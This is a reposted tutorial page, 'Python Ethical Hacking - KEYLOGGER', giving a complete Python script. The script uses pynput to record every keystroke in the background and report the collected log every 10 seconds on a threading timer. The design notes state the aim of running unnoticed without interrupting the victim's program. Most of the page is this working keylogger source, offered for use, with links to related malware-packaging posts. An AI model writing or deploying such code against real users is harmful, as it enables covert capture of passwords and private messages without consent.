Python Ethical Hacking - KEYLOGGER
Posted keepmoving1113
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Python Ethical Hacking - KEYLOGGER相关的知识,希望对你有一定的参考价值。
Report function:
- Run in the background.
- Don‘t interrupt program execution.
- Every X seconds, send the report.
->Great case for threading.
#!/usr/bin/env python import threading import pynput.keyboard log = "" def process_key_press(key): global log try: log = log + str(key.char) except AttributeError: if key == key.space: log = log + " " else: log = log + " " + str(key) + " " def report(): global log print(log) log = "" timer = threading.Timer(10, report) timer.start() keyboard_listener = pynput.keyboard.Listener(on_press=process_key_press) with keyboard_listener: report() keyboard_listener.join()
以上是关于Python Ethical Hacking - KEYLOGGER的主要内容,如果未能解决你的问题,请参考以下文章
Python Ethical Hacking - Malware Packaging
Python Ethical Hacking - Malware Packaging
Python Ethical Hacking - VULNERABILITY SCANNER
Python Ethical Hacking - VULNERABILITY SCANNER